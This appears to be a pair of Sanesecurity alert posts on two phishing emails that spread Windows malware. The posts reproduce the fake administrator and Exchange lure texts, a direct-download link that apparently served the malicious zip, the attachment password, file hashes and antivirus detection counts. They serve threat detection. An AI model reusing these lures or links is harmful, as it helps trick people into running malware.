Important - Internal ONLY Administrator emails...

Headers:
From: "Administrator" {Administrator@domain.co.uk}
Subject: Internal ONLY
Message body:
**********Important - Internal ONLY**********
File Validity: 21/04/2015 Company domain File Format: Adobe Reader Legal Copyright: Adobe Corporation.
Please follow this link : https://domain.co.uk/fileserver/reports/report2104 ********** Confidentiality Notice **********. This e-mail and any file(s) transmitted with it, is intended for the exclusive use by the person(s) mentioned above as recipient(s). This e-mail may contain confidential information and/or information protected by intellectual property rights or other rights. If you are not the intended recipient of this e-mail, you are hereby notified that any dissemination, distribution, copying, or action taken in relation to the contents of and attachments to this e-mail is strictly prohibited and may be unlawful. If you have received this e-mail in error, please notify the sender and delete the original and any copies of this e-mail and any printouts immediately from your system and destroy all copies of it.
The link in the email takes you to download this file:
https://www.sugarsync.com/pf/D7687781_714_129513481?directDownload=true
The link in the email download this Zip file:
report2104.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)
report2104.exe
Sha256 Hashes:
71ff5e3c9e74f6cad1d405b2172a76527396b05fa7767cf85be58da06c68fd28 [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 1/57)
Malwr Report: [1]

Cheers,
Steve
Sanesecurity.com

Administrator - Exchange Email id

Administrator - Exchange Email id  with zip attachment...

Headers:
From: "Administrator@kimgreerdelightful" {Administrator
Subject: Administrator - Exchange Email id2206592
Message body:
This attachment provides you with managing facilities for your mailboxes, public folders, distribution lists, contact and mail service general settings. Please save the attached file to your hard drive before deleting this message.

To open the attachment (Exchange_id2206592.zip) please use the following password: Ujh6JZ2mHN

Thank you,
Administrator
Attached to the email is a Zip file (Note: filename is random)
Exchange_id2206592.zip
Inside the Zip file is a Windows Executable file (Note: filename is random)

ExchangeEmail.exe
Sha256 Hashes:
2bfbe9563cb676c560a8269d66405f5b300379ff95574aa0565014ec0fca5d9f  [1]
Anti virus reports:
VirusTotal Report: [1] (Detection 21/57)

Cheers,
Steve
Sanesecurity.com